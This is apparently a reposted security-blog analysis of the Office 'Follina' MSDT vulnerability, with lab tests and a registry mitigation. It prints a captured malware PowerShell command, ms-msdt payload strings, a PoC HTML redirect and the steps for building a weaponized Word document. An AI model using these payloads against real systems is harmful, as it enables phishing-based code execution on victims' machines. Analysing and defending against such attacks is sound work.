Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

admin 2022年6月1日09:43:42安全漏洞评论70 views2348字阅读7分49秒阅读模式
6月01日-漏洞公告

WGET 执行现在Bacco (@0xBacco) / Twitter让我做一些测试,他偶然发现如果他们通过 powershell (iwr) 执行“wget target”,那么代码就会执行。所以我用 SYSMON 和 PROCESS MONITOR 把命令扔进了实验室,然后...... WTF!

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

wget 不提示执行代码

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

这个漏洞可以通过多种方法来传递,但在野外看到的方法是网络钓鱼。我没有详细说明确切的样本流程,但它可能会像这个高级视图一样被利用:

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

应该注意的是,如果文件具有网络标记(备用数据流区域标识符)并且启用了保护模式,则该链不会在 docx 版本中触发,但是威胁参与者可以通过一些方法绕过这一点(例如包装文件) 或者干脆使用 RTF 格式!!!(RTF 不受文件预览和 MOTW 保护)


恶意软件执行

具体示例显示以下托管在网络服务器 (xmlformats[.com]) 上

$cmd = "c:windowssystem32cmd.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:userspublic&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";


禁用漏洞利用

组策略

您可以通过 GPO 禁用此功能(与 reg hacks 相比,这是一种完全受支持的方法)


您通过注册表执行此操作:

reg add “HKLMSOFTWAREPoliciesMicrosoftWindowsScriptedDiagnostics” /t REG_DWORD /v EnableDiagnostics /d 0

或通过 GUI(本地)或通过 GPMC 等在域环境中。

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

https://twitter.com/gentilkiwi/status/1531384447219781634?s=20&t=bt_RKO0zsGMfuPQpO2aRKA


漏洞利用如何运作?

TLDR:我把我的文件放在这里:

https://github.com/mr-r3b00t/msdt_pwn


为了创建它,我们使用了:

05-2022-0438.doc (MD5: 52945AF1DEF85B171870B31FA4782E52) – 交互式分析 – ANY.RUN

MSDT 可用于执行代码:例如

ms-msdt:/id PCWDiagnostic /skip force /param “IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../ ../../../../../../.exe IT_AutoTroubleshoot=ts_AUTO”

Word 文档加载一个模板,该模板具有指向 HTML 文件的远程链接,该 HTML 文件使用 MSDT 加载和执行代码 (PowerShell)。


它可能加载的文件(HTML)可能看起来像这样:(这是来自@mkolsek 我的原始模块有一些问题)

参考:https://twitter.com/mkolsek/status/1531217733546823681?s=20&t=STUQ_ElmlfqccTRknRGGWg


window.location.href = “ms-msdt:/id PCWDiagnostic /skip force /param ”IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../.. /../../../../../../../../../../../../Windows/System32/mpsigstub.exe ””;

有效负载必须至少为 4096 字节(感谢 John H!)所以填充这个(你可以转储大量评论的废话!


word文档结构:

Word 文档是 ZIP 文件(所以只需解压缩文件,如果您想要更轻松的点击体验,请重命名为 zip)它们包含几个目录:

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

在“词”里面我们有

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

在 _rels 我们有:

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

这是包含指向恶意 html 的外部链接的位置:


Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

我们已经使这个“安全”


现在我们将所有文件压缩备份并重命名为 doc。


我们已经确定了入口点并启用了 POC 测试工具。


成分

  • 使用“ms-msdt”URL 托管“恶意”HTML 的 Web 服务器

  • 带有 msdt 链接的 word 文档(指向上述恶意负载)

  • 安装了 Windows 和 Office (word) 的设备

我们可以在一台 Windows 机器(客户端或服务器)上完成这一切:


在 Windows 客户端上,我们可以安装 IIS(或者简单地使用 python 网络服务器等)

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

现在我们有一个本地网络服务器,我们加载 poc.html

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

这是使用 Windows 11 和 Office 365 Pro。

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

如您所见,这并不成功!(一件好事!)

我只是将一些较旧的东西(Windows 10 和 Office 2016)部署到实验室,所以很快会再次更新!

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

好的,所以我使用 Office 2016 部署到 Windows 10 x64 并成功执行(感谢修复 html 错误)

RTF

这也可以以 RTF 格式部署,当与文件预览结合使用时,可以实现零点击攻击。

Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

原文始发于微信公众号(Ots安全):Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月1日09:43:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina” http://cn-sec.com/archives/1074594.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: